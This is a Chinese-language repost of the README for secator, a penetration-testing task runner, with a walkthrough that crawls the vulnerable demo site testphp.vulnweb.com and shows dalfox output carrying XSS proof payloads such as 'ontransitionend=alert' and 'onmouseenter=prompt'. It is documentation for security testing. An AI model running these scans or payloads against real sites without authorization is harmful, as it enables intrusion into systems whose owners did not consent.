secator
是一款用于安全评估的任务和工作流运行器。它支持数十种知名的安全工具,旨在提高渗透测试人员和安全研究人员的工作效率。
演示
https://github.com/freelabz/secator/raw/main/images/demo.gif
特色
- 精选命令列表
- 统一输入选项
- 统一输出架构
- CLI 和库的使用
- Celery 的分布式选项
- 从简单任务到复杂工作流程的复杂性
- 可定制
支持的工具
secator
集成了以下工具:
|
|
|
---|---|---|
httpx |
|
http |
cariddi |
|
http/crawler |
gau |
|
http/crawler |
gospider |
|
http/crawler |
katana |
|
http/crawler |
dirsearch |
|
http/fuzzer |
feroxbuster |
|
http/fuzzer |
ffuf |
|
http/fuzzer |
h8mail |
|
osint |
dnsx |
|
recon/dns |
dnsxbrute |
|
recon/dns |
subfinder |
|
recon/dns |
fping |
|
recon/ip |
mapcidr |
|
recon/ip |
naabu |
|
recon/port |
maigret |
|
recon/user |
gf |
|
tagger |
grype |
|
vuln/code |
dalfox |
|
vuln/http |
msfconsole |
|
vuln/http |
wpscan |
|
vuln/multi |
nmap |
|
vuln/multi |
nuclei |
|
vuln/multi |
searchsploit |
|
exploit/search |
您可以随时通过打开问题来请求添加新工具,但在这样做之前,请检查该工具是否符合我们的选择标准。如果不符合但您仍想将其集成到secator
,则可以将其插入(请参阅开发指南)。
安装
安装secator
Pipx
pipx install secator
pip
pip install secator
bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
卷挂载 -v 是将所有 secator 报告保存到主机所必需的,并且建议使用 –net=host 授予对主机网络的完全访问权限。
您可以为此命令添加别名,以便更轻松地运行它:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
现在你可以运行 secator,就像它安装在裸机上一样:
secator --help
Docker Compose
git clone https://github.com/freelabz/secatorcd secator docker-compose up -d docker-compose exec secator-client secator --help
注意:如果您选择了 Bash、Docker 或 Docker Compose 安装方法,则可以跳过下一部分并直接转到使用方法。
安装语言
secator
使用外部语言,因此您可能需要安装这些工具使用的语言(假设它们尚未安装在您的系统上)。
如果您不从外部管理所需的语言,我们会提供实用程序来安装它们:
go
secator install langs go
Ruby
secator install langs ruby
安装工具
secator
默认情况下不安装它支持的任何外部工具。
我们提供实用程序来安装或更新每个支持的工具,这些工具应适用于支持以下所有系统的系统apt
:
所有工具
secator install tools
特殊工具
secator install tools <TOOL_NAME>
例如,要安装httpx
,请使用:
secator install tools httpx
在运行 secator 之前,请确保您使用的是每个工具的最新可用版本,否则您可能会遇到解析/格式化问题。
安装插件
secator
安装有最少量的依赖项。
有多种可用的插件secator
:
worker
添加对 Celery 工作者的支持(请参阅使用 Celery 进行分布式运行)。
secator install addons worker
添加对 Google Drive 导出器的支持(-o gdrive
)。
secator install addons google
mongodb
添加对 MongoDB 驱动程序的支持(-driver mongodb
)。
secator install addons mongodb
redis
添加对 Redis 后端(Celery)的支持。
secator install addons redis
dev
添加运行测试所需的开发工具coverage
等。flake8
secator install addons dev
trace
添加跟踪功能所需的跟踪工具,如memray
和pyinstrument
。
secator install addons trace
build
添加hatch
用于构建和发布 PyPI 包。
secator install addons build
安装 CVEs
secator
对https://cve.circl.lu/进行远程 API 调用,以获取有关其遇到的 CVE 的详细信息。我们提供了一个子命令来将所有已知的 CVE 下载到本地,以便将来从磁盘进行查找:
secator install cves
检查安装健康状况
要确定您的系统上安装了哪些语言或工具(及其版本):
secator health
secator --help
使用示例
运行模糊测试任务(ffuf
):
secator x ffuf http://testphp.vulnweb.com/FUZZ
运行 URL 爬取工作流程:
secator w url_crawl http://testphp.vulnweb.com
运行主机扫描:
secator s host mydomain.com
以及更多…列出您可以使用的所有任务/工作流程/扫描:
secator x--helpsecator w --helpsecator s --help
使用方法
本快速入门将重点介绍如何使用secator
查找http://testphp.vulnweb.com网站上的漏洞。
我们将从使用简单的secator
任务开始,然后展示如何使用工作流来显著加快会话速度。
使用任务
步骤 1:katana
在根 URL 上运行
我们首先使用爬虫来查找一些可能对漏洞利用有用的 URL。我们最常用的katana
是 ProjectDiscovery 的工具。
我们将结果保存到.txt
文件中:
secatorxkatanahttp://testphp.vulnweb.com -o txt
__
__________________/ /__________
/ ___/ _ / ___/ __ `/ __/ __ / ___/
(__ / __/ /__/ /_/ / /_/ /_/ / /
/____/___/___/__,_/__/____/_/ v0.0.1
freelabz.com
[13:34:53] katana -silent -jc -js-crawl -known-files all -u http://testphp.vulnweb.com -json -concurrency 50 _base.py:614
🔗 http://testphp.vulnweb.com [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/high [404] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/index.php
🔗 http://testphp.vulnweb.com/style.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/privacy.php [404] [PHP:5.6.40, Ubuntu, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/AJAX/index.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/categories.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/cart.php [200] [PHP:5.6.40, Ubuntu, DreamWeaver, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/artists.php [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/hpp/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/disclaimer.php [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/login.php [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php [200] [Ubuntu, Nginx:1.19.0, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/guestbook.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/userinfo.php
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/comment.php?aid=3 [200] [Ubuntu, Nginx:1.19.0, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/search.php?test=query [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/Templates/high
🔗 http://testphp.vulnweb.com/comment.php?aid=2
🔗 http://testphp.vulnweb.com/artists.php?artist=1 [200] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/hpp/?pp=12 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/signup.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/comment.php?aid=1
🔗 http://testphp.vulnweb.com/AJAX/showxml.php [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/AJAX/styles.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/artists.php?artist=3 [200] [PHP:5.6.40, Ubuntu, DreamWeaver, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=2 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/showimage.php?file= [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu]
🔗 http://testphp.vulnweb.com/artists.php?artist=2 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=4
🔗 http://testphp.vulnweb.com/listproducts.php?cat=1 [200] [Nginx:1.19.0, PHP:5.6.40, Ubuntu, DreamWeaver]
🗄 Saved TXT reports to
• /home/vagrant/.secator/reports/default/tasks/task_katana_target_2023_07_04-01_33_13_152782_PM.txt
• /home/vagrant/.secator/reports/default/tasks/task_katana_url_2023_07_04-01_33_13_152782_PM.txt
katana
发现了一些非常有趣的结果,包括一些可能存在漏洞的 PHP 文件。步骤 2:将httpx
找到的 URL 运行到活动 URL
爬虫通常从 HTML 响应主体中查找 URL,这意味着我们不知道这些 URL 是否真正响应 HTTP 请求。
为了仅过滤出提供有效 HTTP 状态代码的 URL,我们可以httpx
在之前的结果(txt 文件)上使用。我们将添加一些速率限制(-rl
),以尊重服务器,而不是无缘无故地对其进行 DDoS 攻击。
我们只想保留一些 HTTP 代码(-mc
),例如200
,,301
并且500
在出现错误时我们可以利用:
secator x httpx /home/vagrant/.secator/reports/default/tasks/task_katana_target_2023_07_04-01_33_13_152782_PM.txt -rl 10 -mc 200,301,500
__
________ _________ _/ /_____ _____
/ ___/ _ / ___/ __ `/ __/ __ / ___/
(__ / __/ /__/ /_/ / /_/ /_/ / /
/____/___/___/__,_/__/____/_/ v0.0.1
freelabz.com
[13:19:35] httpx -silent -td -asn -cdn -l /tmp/httpx_2023_07_04-01_19_35_686343_PM.txt -json -threads 50 -match-code 200,301,500 _base.py:614
🔗 http://testphp.vulnweb.com/showimage.php?file [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [image/jpeg] [196]
🔗 http://testphp.vulnweb.com/hpp [200] [HTTP Parameter Pollution Example] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [203]
🔗 http://testphp.vulnweb.com/cart.php [200] [you cart] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4903]
🔗 http://testphp.vulnweb.com/categories.php [200] [picture categories] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6115]
🔗 http://testphp.vulnweb.com/artists.php?artist=3 [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6193]
🔗 http://testphp.vulnweb.com/comment.php?aid=3 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/comment.php?aid=2 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/AJAX/showxml.php [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [11]
🔗 http://testphp.vulnweb.com/style.css [200] [nginx/1.19.0] [Nginx:1.19.0] [text/css] [5482]
🔗 http://testphp.vulnweb.com/artists.php?artist=1 [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6251]
🔗 http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php [200] [Document titleg] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4697]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3 [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [313]
🔗 http://testphp.vulnweb.com/AJAX/styles.css [200] [nginx/1.19.0] [Nginx:1.19.0] [text/css] [562]
🔗 http://testphp.vulnweb.com/hpp/?pp=12 [200] [HTTP Parameter Pollution Example] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [383]
🔗 http://testphp.vulnweb.com/login.php [200]
此处为隐藏的内容
注册登录后,方可查看
登录
[nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5523]
🔗 http://testphp.vulnweb.com/guestbook.php [200] [guestbook] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5390]
🔗 http://testphp.vulnweb.com/signup.php [200] [signup] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6033]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [319]
🔗 http://testphp.vulnweb.com/search.php?test=query [200] [search] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4732]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4699]
🔗 http://testphp.vulnweb.com/AJAX/index.php [200] [ajax test] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4236]
🔗 http://testphp.vulnweb.com/disclaimer.php [200] [disclaimer] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5524]
🔗 http://testphp.vulnweb.com/artists.php?artist=2 [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [6193]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=4 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4699]
🔗 http://testphp.vulnweb.com/artists.php [200] [artists] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5328]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=2 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [5311]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [975]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=1 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [7880]
🔗 http://testphp.vulnweb.com/comment.php?aid=1 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2 [200] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [279]
🔗 http://testphp.vulnweb.com [200] [Home of Acunetix Art] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4958]
🔗 http://testphp.vulnweb.com/index.php [200] [Home of Acunetix Art] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4958]
🗄 Saved TXT reports to
• /home/vagrant/.secator/reports/default/tasks/task_httpx_target_2023_07_04-01_34_22_081275_PM.txt
• /home/vagrant/.secator/reports/default/tasks/task_httpx_url_2023_07_04-01_34_22_081275_PM.txt
gf
步骤 3:在找到的 URL 上运行
gf
允许在 URL 上运行模式,我们可以使用它来快速检测潜在的有趣 URL,包括 XSS、LFI、SSRF、RCE、有趣的参数或不安全的直接对象引用。让我们寻找潜在的 XSS:
secatorxgf--patternxss /home/vagrant/.secator/reports/default/tasks/task_httpx_target_2023_07_04-01_34_22_081275_PM.tx
🏷️ [xss]http://testphp.vulnweb.com/comment.php?aid=1 []
🏷️ [xss]http://testphp.vulnweb.com/comment.php?aid=2 []
🏷️ [xss]http://testphp.vulnweb.com/comment.php?aid=3 []
🏷️ [xss]http://testphp.vulnweb.com/hpp/?pp=12 []
嗯,看来我们这里可能有一些有趣的 XSS 目标。让我们来dalfox
找出答案吧!步骤 4:dalfox
在潜在的 XSS 链接上运行
dalfox
是一个非常全面的 XSS 检查器,让我们在已识别的目标上运行它:
secatorxdalfoxhttp://testphp.vulnweb.com/hpp/?pp=12
__
__________________/ /__________
/ ___/ _ / ___/ __ `/ __/ __ / ___/
(__ / __/ /__/ /_/ / /_/ /_/ / /
/____/___/___/__,_/__/____/_/ v0.0.1
freelabz.com
[13:41:28] dalfox --silence url 'http://testphp.vulnweb.com/hpp/?pp=12' --format json --worker 50 _base.py:614
🚨 [Verified XSS] [high] http://testphp.vulnweb.com/hpp/ [CWE-83] [inject_type:inATTR-double(3)-URL, poc_type:plain, method:GET,
data:http://testphp.vulnweb.com/hpp/?pp=12%22id%3Dx+tabindex%3D1+style%3D%22display%3Ablock%3Btransition%3Aoutline+1s%3B%22+ontransitionend%3Dalert.apply%28null%2C1%29+class%3Ddalfox+, param:pp, payload:"id=x tabindex=1
style="display:block;transition:outline 1s;" ontransitionend=alert.apply(null,1) class=dalfox , evidence:4line: ms.php?p=valid&pp=12"id=x tabindex=1 style="display:block;transition:outline 1s;, message_id:1103, message_str:Triggered XSS Payload
(found DOM Object): pp="id=x tabindex=1 style="display:block;transition:outline 1s;" ontransitionend=alert.apply(null,1) class=dalfox ]
我们发现了已验证的 XSS!
我们可以在浏览器中验证这个 XSS,但这dalfox
已经给我们提供了它有效的证据……
使用任务管道
secator
支持开箱即用的 UNIX 管道。您可以编写一个secator
管道来自动执行前面 4 个步骤:
secator x katana http://testphp.vulnweb.com | secator x httpx | secator x gf --pattern lfi -fmt'{match}' | secator x dalfox
您不需要指定任何额外的标志,除了正常运行时,因为它secator
会检测到您正在运行 UNIX 管道并在任务调用之间自动传递正确的输入:
-
默认情况下,它将传递上一个 stdin
任务的原始字符串结果。如果任务可以输出多个输出类型output_types
,则选择类定义属性中的第一个。 -
我们可以使用选项指定在传递原始字符串时要使用的字段 -fmt
。在上一个命令中,该-fmt '{match}'
选项将告诉 secator 仅将我们找到的对象match
的字段作为字符串输入传递给。Tag
gf
dalfox
命令输出
[13:50:29] katana -silent -jc -js-crawl -known-files all -u http://testphp.vulnweb.com -json -concurrency 50 _base.py:614
[13:50:43] httpx -silent -td -asn -cdn -l /tmp/httpx_2023_07_04-01_50_43_044323_PM.txt -json -threads 50 _base.py:614
[13:50:49] cat /tmp/gf_2023_07_04-01_50_49_787397_PM.txt | gf xss _base.py:614
[13:50:49] dalfox --silence file /tmp/dalfox_2023_07_04-01_50_49_855768_PM.txt --format json --worker 50 _base.py:614
🚨 [Verified XSS] [high] http://testphp.vulnweb.com/hpp/ [CWE-83] [inject_type:inATTR-double(3)-URL, poc_type:plain, method:GET,
data:http://testphp.vulnweb.com/hpp/?pp=12%22%26%2339%3B%3E%3Caudio+controls+ondurationchange%3Dprompt%281%29+id%3Ddalfox%3E%3Csource+src%3D1.mp3+type%3Daudio%2Fmpeg%3E%3C%2Faudio%3E, param:pp, payload:"'><audiocontrols
ondurationchange=prompt(1)id=dalfox><sourcesrc=1.mp3type=audio/mpeg></audio>, evidence:4 line: ms.php?p=valid&pp=12"'><audiocontrolsondurationchange=prompt(1)id=dalfox>, message_id:1862, message_str:Triggered XSS Payload (found DOM
Object): pp="'><audiocontrolsondurationchange=prompt(1)id=dalfox><sourcesrc=1.mp3type=audio/mpeg></audio>]
与之前的冗长任务相比,这已经是很好的时间改进了。
使用工作流
任务管道适合快速查找事物,但工作流程更适合在不同的目标集上重复同一组任务,所有任务使用相同的输入选项,同时过滤最终结果并对实时结果做出反应等……
以下是secator
与上一组任务相对应的工作流程:xss_finder.yaml
type:workflow
name:xss_finder
description:XSSFinder
tasks:
katana:
description:CrawlingrootURL
httpx:
description:FindingaliveURLs
targets_:
-type:url
field:url
condition:item.status_code==0
gf:
description:IdentifyingXSS
targets_:
-url.url
dalfox:
description:VerifyingXSS
targets_:
-type:tag
field:match
condition:item.name=='xss'
以下是使用以下方式运行的工作流程secator
:
secator w xss_finder.yaml http://testphp.vulnweb.com
命令输出
__
__________________/ /__________
/ ___/ _ / ___/ __ `/ __/ __ / ___/
(__ / __/ /__/ /_/ / /_/ /_/ / /
/____/___/___/__,_/__/____/_/ v0.0.1
freelabz.com
╭────── Workflow xss_finder ──────╮
│ 📜 Description: XSS Finder │
│ 👷 Workspace: default │
│ 🍐 Targets: │
│ • http://testphp.vulnweb.com │
│ 📌 Options: │
│ • threads: 50 │
│ • headless: False │
│ • system_chrome: False │
│ • follow_redirect: False │
│ • debug_resp: False │
│ ✉ Exporters: │
│ • json │
│ • csv │
╰─────────────────────────────────╯
[14:03:31] 🎉 Workflow xss_finder starting... _base.py:614
🔧 Crawling root URL ...
[14:03:32] katana -silent -jc -js-crawl -known-files all -u http://testphp.vulnweb.com -json -concurrency 50 _base.py:614
🔗 http://testphp.vulnweb.com [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/high [404] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/ [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/index.php
🔗 http://testphp.vulnweb.com/style.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/guestbook.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/AJAX/index.php [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/login.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/cart.php [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/privacy.php [404] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/hpp/ [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/categories.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/artists.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/disclaimer.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/userinfo.php
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3
🔗 http://testphp.vulnweb.com/comment.php?aid=1 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=4 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/comment.php?aid=3
🔗 http://testphp.vulnweb.com/artists.php?artist=2 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/comment.php?aid=2
🔗 http://testphp.vulnweb.com/signup.php [200] [PHP:5.6.40, DreamWeaver, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/artists.php?artist=3 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/artists.php?artist=1 [200] [Ubuntu, PHP:5.6.40, DreamWeaver, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=1 [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40, DreamWeaver]
🔗 http://testphp.vulnweb.com/AJAX/showxml.php [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/showimage.php?file= [200] [Nginx:1.19.0, Ubuntu, PHP:5.6.40]
🔗 http://testphp.vulnweb.com/hpp/?pp=12 [200] [Ubuntu, PHP:5.6.40, Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/AJAX/styles.css [200] [Nginx:1.19.0]
🔗 http://testphp.vulnweb.com/Templates/high
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=2 [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu, DreamWeaver]
🔗 http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ [200] [PHP:5.6.40, Nginx:1.19.0, Ubuntu]
🔗 http://testphp.vulnweb.com/search.php?test=query [200] [Nginx:1.19.0, Ubuntu, DreamWeaver, PHP:5.6.40]
🔧 Finding alive URLs ...
[14:03:45] httpx -silent -td -asn -cdn -l /tmp/httpx_2023_07_04-02_03_45_807367_PM.txt -json -threads 50 _base.py:614
🔗 http://testphp.vulnweb.com/Templates/high [404] [404 Not Found] [nginx/1.19.0] [Nginx:1.19.0] [text/html] [153]
🔗 http://testphp.vulnweb.com/index.php [200] [Home of Acunetix Art] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4958]
🔗 http://testphp.vulnweb.com/comment.php?aid=2 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/userinfo.php [302] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [14]
🔗 http://testphp.vulnweb.com/comment.php?aid=3 [200] [comment on artist] [nginx/1.19.0] [Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [1252]
🔗 http://testphp.vulnweb.com/listproducts.php?cat=3 [200] [pictures] [nginx/1.19.0] [DreamWeaver, Nginx:1.19.0, PHP:5.6.40, Ubuntu] [text/html] [4699]
🔧 Identifying XSS ...
[14:03:52] cat /tmp/gf_2023_07_04-02_03_52_398624_PM.txt | gf xss _base.py:614
🏷️ [xss] http://testphp.vulnweb.com/comment.php?aid=1 []
🏷️ [xss] http://testphp.vulnweb.com/comment.php?aid=2 []
🏷️ [xss] http://testphp.vulnweb.com/comment.php?aid=3 []
🏷️ [xss] http://testphp.vulnweb.com/hpp/?pp=12 []
🔧 Verifying XSS ...
[14:03:54] dalfox --silence file /tmp/dalfox_2023_07_04-02_03_52_411553_PM.txt --format json --worker 50 _base.py:614
🚨 [Verified XSS] [high] http://testphp.vulnweb.com/hpp/ [CWE-83] [inject_type:inATTR-double(3)-URL, poc_type:plain, method:GET,
data:http://testphp.vulnweb.com/hpp/?pp=12%22onmouseenter%3Dprompt.call%28null%2C1%29+class%3Ddalfox+, param:pp, payload:"onmouseenter=prompt.call(null,1) class=dalfox , evidence:4 line: ms.php?p=valid&pp=12"onmouseenter=prompt.call(null,1)
class=dalfox ">link2</a><b, message_id:1540, message_str:Triggered XSS Payload (found DOM Object): pp="onmouseenter=prompt.call(null,1) class=dalfox ]
[14:04:20] 🎉 Workflow xss_finder succeeded in 48 seconds. _base.py:614
🗄 Saved JSON report to /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_2023_07_04-02_04_20_160856_PM.json
🗄 Saved CSV reports to
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_target_2023_07_04-02_04_20_160856_PM.csv
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_url_2023_07_04-02_04_20_160856_PM.csv
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_tag_2023_07_04-02_04_20_160856_PM.csv
• /home/vagrant/.secator/reports/default/workflows/workflow_xss_finder_vulnerability_2023_07_04-02_04_20_160856_PM.csv
了解更多
要深入了解secator
,请查看:
-
我们的完整文档 -
我们的入门教程视频 -
我们的Medium 帖子 -
在社交媒体上关注我们: Twitter 上的@freelabz和YouTube 上的@FreeLabz
项目地址
GitHub:
https://github.com/freelabz/secator
原文始发于微信公众号(云梦安全):secator – 渗透测试人员的瑞士军刀
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论